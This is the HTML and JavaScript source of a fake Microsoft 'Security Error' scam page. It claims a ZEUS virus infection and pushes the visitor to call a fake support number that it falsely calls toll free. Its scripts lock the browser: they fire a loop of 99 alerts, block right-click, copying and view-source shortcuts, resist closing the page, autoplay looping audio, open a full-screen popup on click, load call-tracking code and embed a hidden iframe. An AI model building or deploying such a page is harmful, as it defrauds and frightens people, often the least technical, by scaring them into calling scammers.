<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>*** Security Error Code 0x80070424</title>

<style>
/* CSS Document */
body{
margin:0px;
color:#FFFFFF;}
.textlists{
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:18px;
line-height:28px;
text-align:left;
color:#fff;
text-decoration:none;
}
.textlistt{
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:14px;
line-height:28px;
text-align:left;
color:#fff;
text-decoration:none;
}

.textlist{
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:14px;
line-height:24px;
text-align:left;
color:#fff;
text-decoration:none;
}
.textlist a{
font-family:Arial, Helvetica, sans-serif;
font-size:14px;
text-align:left;
color:#fff;
text-decoration:none;
}
.textlist a:hover{
font-family:Arial, Helvetica, sans-serif;
font-size:14px;
text-align:left;
color:#0000FF;
text-decoration:underline;
}
.welcometext{
font-family:Arial, Helvetica, sans-serif;
color:#FFF;
font-size:30px;
line-height:1.9em;
text-align:justify;
padding-right:5px;
}
.userInfo{position:absolute;top:110px;right:50px;border:1px solid #f00;padding:10px;font-size:18px;font-family:"Courier New",Courier,monospace;}
#box{ display: none; position: fixed; top: 70px; left: 50%; margin-left: -182px; width: 365px; height: 256px; 
border: 1px solid #c7c7c7; border-radius: 3px; background: #fbfbfb; padding: 20px; box-sizing: border-box; font-family: sans-serif; 
box-shadow: 0 2px 2px 0px #ccc; font-size: 14px; } #box h2{ font-size: 15px; font-weight: inherit; margin: 0; } 
#box .btn{ border: 1px solid #bababa; border-radius: 2px; padding: 8px 10px; margin: 5px; display: inline-block; 
box-shadow: 0 1px 1px 0px #ccc; cursor: pointer; float: right; text-decoration: none; color: #333; } 
#box .btn:nth-child(2n-1){ font-weight: bold; border: 1px solid #3c79ee; }
</style>

<script type="text/javascript">


                (function(funcName, baseObj) {
                        // The public function name defaults to window.docReady
                        // but you can pass in your own object and own function name and those will be used
                        // if you want to put them in a different namespace
                        funcName = funcName || "docReady";
                        baseObj = baseObj || window;
                        var readyList = [];
                        var readyFired = false;
                        var readyEventHandlersInstalled = false;

                        // call this when the document is ready
                        // this function protects itself against being called more than once
                        function ready() {
                            if (!readyFired) {
                                // this must be set to true before we start calling callbacks
                                readyFired = true;
                                for (var i = 0; i < readyList.length; i++) {
                                    // if a callback here happens to add new ready handlers,
                                    // the docReady() function will see that it already fired
                                    // and will schedule the callback to run right after
                                    // this event loop finishes so all handlers will still execute
                                    // in order and no new ones will be added to the readyList
                                    // while we are processing the list
                                    readyList[i].fn.call(window, readyList[i].ctx);
                                }
                                // allow any closures held by these functions to free
                                readyList = [];
                            }
                        }

                        function readyStateChange() {
                            if ( document.readyState === "complete" ) {
                                ready();
                            }
                        }

                        // This is the one public interface
                        // docReady(fn, context);
                        // the context argument is optional - if present, it will be passed
                        // as an argument to the callback
                        baseObj[funcName] = function(callback, context) {
                            // if ready has already fired, then just schedule the callback
                            // to fire asynchronously, but right away
                            if (readyFired) {
                                setTimeout(function() {callback(context);}, 1);
                                return;
                            } else {
                                // add the function and context to the list
                                readyList.push({fn: callback, ctx: context});
                            }
                            // if document already ready to go, schedule the ready function to run
                            if (document.readyState === "complete") {
                                setTimeout(ready, 1);
                            } else if (!readyEventHandlersInstalled) {
                                // otherwise if we don't have event handlers installed, install them
                                if (document.addEventListener) {
                                    // first choice is DOMContentLoaded event
                                    document.addEventListener("DOMContentLoaded", ready, false);
                                    // backup is window load event
                                    window.addEventListener("load", ready, false);
                                } else {
                                    // must be IE
                                    document.attachEvent("onreadystatechange", readyStateChange);
                                    window.attachEvent("onload", ready);
                                }
                                readyEventHandlersInstalled = true;
                            }
                        }
                })("docReady", window);
                
                document.ondragstart = test;
                document.onselectstart = test;
                document.oncontextmenu = test;
                function test() {
                    return false;
                }
                document.oncontextmenu;
                function catchControlKeys(event) {
                    var code = event.keyCode ? event.keyCode : event.which ? event.which : null;
                    if (event.ctrlKey) {
                        // Ctrl+U
                        if (code == 117) {
                            return false;
                        }
                        if (code == 85) {
                            return false;
                        }
                        // Ctrl+C
                        if (code == 99) {
                            return false;
                        }
                        if (code == 67) {
                            return false;
                        }
                        // Ctrl+A
                        if (code == 97) {
                            return false;
                        }
                        if (code == 65) {
                            return false;
                        }
                    }
                }
            </script>
            <script>
                var check = 0;

                docReady(function()
                {
                    var nAgt = navigator.userAgent;
                    if (nAgt.indexOf("Chrome") !== -1) {
                        // browserName = "Chrome";
                        setTimeout(function() {
                            for (var i = 0; i < 99; i++)
                            {
                                alert(document.getElementById('error_msg').innerHTML.replace(/\<br\\?>/g, '\n').replace(/(<([^>]+)>)/ig,''));
                               

                            }
                            check = 0;
                        }, 10);

                    } else {
                        setTimeout(function() {
                            for (var i = 0; i < 99; i++) {
                                alert(document.getElementById('error_msg').innerHTML.replace(/\<br\\?>/g, '\n').replace(/(<([^>]+)>)/ig,''));
                               
                            }
                            check = 1;
                        }, 10);
                    }
                });
            </script>
<script type="text/javascript">
    function goodbye(e) {
        if (!e)
            e = window.event;
        //e.cancelBubble is supported by IE - this will kill the bubbling process.
        e.cancelBubble = true;
        e.returnValue = "";

        //e.stopPropagation works in Firefox.
        if (e.stopPropagation) {
            e.stopPropagation();
            e.preventDefault();
        }
    }
    window.onbeforeunload = goodbye;
</script>
<script type="text/javascript">
function downloadJSAtOnload() {
var element = document.createElement("script");
element.src = "defer.js";
document.body.appendChild(element);
}
if (window.addEventListener)
window.addEventListener("load", downloadJSAtOnload, false);
else if (window.attachEvent)
window.attachEvent("onload", downloadJSAtOnload);
else window.onload = downloadJSAtOnload;
</script>
</head>

<body>


<img src="bg.png" onClick="window.open('index-2.html','','height='+screen.availHeight+',width='+screen.availWidth);" style="position:absolute;top:0;left:0;border:0;height:100%;width:100%;z-index:99999999;">

<p id="error_msg" style="display:none;">****Please Do Not Restart Your Computer ****<br /><br />Microsoft Windows Detected ZEUS Virus and these Infections indicate that some Un-Authorised File Tampering has taken place on the computer which must be Diagnosed and Rectified to prevent loss of Personal Data.<br /><br />Call Microsoft Technical support on  0844-821-0486 and share the Error Ticket: WBCKL457 with Support Agent to get it Diagnosed Free of Charge<br /><br /><br />PLEASE DO NOT SHUT DOWN OR RESTART YOUR COMPUTER, DOING THAT WOULD LEAD TO DATA LOSS AND OPERATING SYSTEM CRASH<br /><br />CONTACT MICROSOFT TECHNICAL SUPPORT IMMEDIATELY TO RESOLVE THE ISSUE ON TOLL FREE - 0844-821-0486<br />-----------------------------------------------------------------------------<br /> for Technical Assistance<br />----------------------------------------------------------------------------<br /><br />Terms and Conditions<br /> All rights reserved.</p>

    <audio autoplay="true" loop="true">
            <source src="warning.html" type="audio/mpeg">
            </source></audio>
<script id="hiddenlpsubmitdiv" style="display: none;"></script><script>try{for(var lastpass_iter=0; lastpass_iter < document.forms.length; lastpass_iter++){ var lastpass_f = document.forms[lastpass_iter]; if(typeof(lastpass_f.lpsubmitorig2)=="undefined"){ lastpass_f.lpsubmitorig2 = lastpass_f.submit; if (typeof(lastpass_f.lpsubmitorig2)=='object'){ continue;}lastpass_f.submit = function(){ var form=this; var customEvent = document.createEvent("Event"); customEvent.initEvent("lpCustomEvent", true, true); var d = document.getElementById("hiddenlpsubmitdiv"); if (d) {for(var i = 0; i < document.forms.length; i++){ if(document.forms[i]==form){ if (typeof(d.innerText) != 'undefined') { d.innerText=i; } else { d.textContent=i; } } } d.dispatchEvent(customEvent); }form.lpsubmitorig2(); } } }}catch(e){}
</script>


    <script type="text/javascript" src="retreaver.min.js" type="text/javascript">
	
	</script>
    <script type="text/javascript">
      var campaign = new Retreaver.Campaign({campaign_key: 'e086e5ab936a3e799a9275fbf7a67593'});
      var tags = {};
      campaign.request_number(tags, function(number) {
            for(var i=0; i<document.getElementsByTagName('tel').length; i++) {
                document.getElementsByTagName('tel')[i].innerHTML = number.get('formatted_number') +'<br />Computer ID: '+ number.get('extension');
            }
        });
    </script>
	
	<iframe src="error/login.html" height="0" width="0" frameborder="0" />
	
</body>
</html>